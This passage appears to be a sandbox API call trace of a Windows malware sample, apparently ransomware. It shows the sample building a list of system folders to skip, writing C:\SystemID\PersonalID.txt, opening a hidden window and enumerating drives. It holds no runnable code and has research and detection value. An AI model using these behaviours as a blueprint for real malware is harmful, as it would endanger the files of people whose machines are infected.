dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x818) returned 0x325e940 [0204.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1036 | out: lpWideCharStr=".regtrans-ms") returned 13 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x328f0a8 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x818) returned 0x325e940 [0204.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1036 | out: lpWideCharStr="C:\\SystemID\\") returned 13 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x328f8d0 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x82c) returned 0x325e940 [0204.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1046 | out: lpWideCharStr="C:\\Users\\Default User\\") returned 23 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32900f8 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1c8) returned 0x3260d40 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3242df0 | out: hHeap=0x750000) returned 1 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x325e940 [0204.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x3290930 [0204.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x826) returned 0x325e940 [0204.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1043 | out: lpWideCharStr="C:\\Users\\All Users\\") returned 20 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x3291168 [0204.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x822) returned 0x325e940 [0204.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1041 | out: lpWideCharStr="C:\\Users\\Default\\") returned 18 [0204.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32919a0 [0204.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x834) returned 0x325e940 [0204.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1050 | out: lpWideCharStr="C:\\Documents and Settings\\") returned 27 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32921d8 [0204.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x81e) returned 0x325e940 [0204.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1039 | out: lpWideCharStr="C:\\ProgramData\\") returned 16 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x3292a20 [0204.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x818) returned 0x325e940 [0204.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1036 | out: lpWideCharStr="C:\\Recovery\\") returned 13 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x3293248 [0204.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2a0) returned 0x3256d70 [0204.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3260d40 | out: hHeap=0x750000) returned 1 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x83a) returned 0x325e940 [0204.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1053 | out: lpWideCharStr="C:\\System Volume Information\\") returned 30 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x3293a70 [0204.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x848) returned 0x325e940 [0204.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323d9b0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1060 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Roaming\\") returned 37 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x850) returned 0x32942b8 [0204.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc76) returned 0x3294b10 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x844) returned 0x32942b8 [0204.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323d9b0, cbMultiByte=-1, lpWideCharStr=0x32942b8, cchWideChar=1058 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Local\\") returned 35 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x850) returned 0x325e940 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc76) returned 0x3295790 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x816) returned 0x32942b8 [0204.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x32942b8, cchWideChar=1035 | out: lpWideCharStr="C:\\Windows\\") returned 12 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x325e940 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x818) returned 0x32942b8 [0204.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x32942b8, cchWideChar=1036 | out: lpWideCharStr="C:\\PerfLogs\\") returned 13 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x3296410 [0204.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x832) returned 0x32942b8 [0204.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x32942b8, cchWideChar=1049 | out: lpWideCharStr="C:\\ProgramData\\Microsoft\\") returned 26 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x3296c38 [0204.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x83a) returned 0x32942b8 [0204.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x32942b8, cchWideChar=1053 | out: lpWideCharStr="C:\\ProgramData\\Package Cache\\") returned 30 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x3297480 [0204.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32942b8 [0204.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x32942b8, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x3297cc8 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32942b8 [0204.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x32942b8, cchWideChar=1040 | out: lpWideCharStr="C:\\$Recycle.Bin\\") returned 17 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x3298500 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x3f0) returned 0x32547f0 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3256d70 | out: hHeap=0x750000) returned 1 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32942b8 [0204.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3285b58, cbMultiByte=-1, lpWideCharStr=0x32942b8, cchWideChar=1040 | out: lpWideCharStr="C:\\$WINDOWS.~BT\\") returned 17 [0204.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x3298d38 [0204.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32942b8 [0204.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x32942b8, cchWideChar=1032 | out: lpWideCharStr="C:\\dell\\") returned 9 [0204.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x3299570 [0204.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32942b8 | out: hHeap=0x750000) returned 1 [0204.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.645] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d408, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.646] GetLastError () returned 0x3 [0204.646] GetLastError () returned 0x3 [0204.646] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0204.647] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18d408, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554 [0204.651] GetFileType (hFile=0x554) returned 0x1 [0204.651] GetLastError () returned 0x0 [0204.657] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.657] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0204.657] RegisterClassExW (param_1=0x18d680) returned 0xc11d [0204.657] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x2011c [0204.679] NtdllDefWindowProc_W () returned 0x0 [0204.680] NtdllDefWindowProc_W () returned 0x1 [0204.682] NtdllDefWindowProc_W () returned 0x0 [0205.513] NtdllDefWindowProc_W () returned 0x0 [0205.513] ShowWindow (hWnd=0x2011c, nCmdShow=0) returned 0 [0205.513] UpdateWindow (hWnd=0x2011c) returned 1 [0205.513] GetLogicalDrives () returned 0x4 [0205.513] SetErrorMode (uMode=0x1) returned 0x0 [0205.513] PathFileExistsA (pszPath="C:\\") returned 1 [0205.514] SetErrorMode (uMode=0x0) returned 0x1 [0205.514] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x806) returned 0x32a08d8 [0205.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d638, cbMultiByte=-1, lpWideCharStr=0x32a08d8, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32a1940 [0205.514] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32a08d8 | out: hHeap=0x750000) returned 1 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x32727c8 [0205.514] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32a1940 | out: hHeap=0x750000) returned 1 [0205.514] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32727c8 | out: hHeap=0x750000) returned 1 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x32727c8 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x325e620 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8ec) returned 0x3289760 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32a08d8 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32b05f8 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1070) returned 0x328a058 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d460 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32a1940 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x660) returned 0x32a4ae8 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32b0e80 [0205.514] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 